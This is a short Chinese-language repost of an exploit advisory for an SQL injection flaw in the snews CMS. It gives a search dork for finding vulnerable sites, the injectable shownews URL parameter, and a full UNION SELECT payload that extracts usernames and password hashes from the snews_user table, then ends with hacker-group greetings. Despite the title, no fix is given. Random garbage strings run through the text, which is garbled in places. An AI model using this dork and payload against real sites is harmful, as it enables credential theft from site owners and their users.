CMS snews SQL注射及修复

admin

标题: CMS snews SQL Injection Vulnerability
作者: By onestree
下载地址 : http://snewscms.com/
2 |8 J; c+ z" h6 r! A$ m4 N! o测试平台 : ubuntu 12.10 / win 7
* d' J  V0 T7 v& b关键词: inurl:"tanyakan pada rumput yang bergoyang"

" h( U6 g* c0 ^! {
*************************************************************
9 T$ n; X  C6 \, ~
; a# f* q: I$ M% y6 PSQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
* ?* u! Q' X% ^8 a8 e. |+ Q
; ^& ?9 q8 K- u: X+ r) |示例
7 G6 r7 i- n+ G- z# w, q" {
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*


9 q! O9 S9 `6 i. s8 u致谢:

  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
     
% V% A8 d' o. `0 t& W# ^9 x, ?          indonesiancoder - moeslimh4x0r - go-coder

. D3 Q$ s) N9 U+ o$ rspesial my hunny :*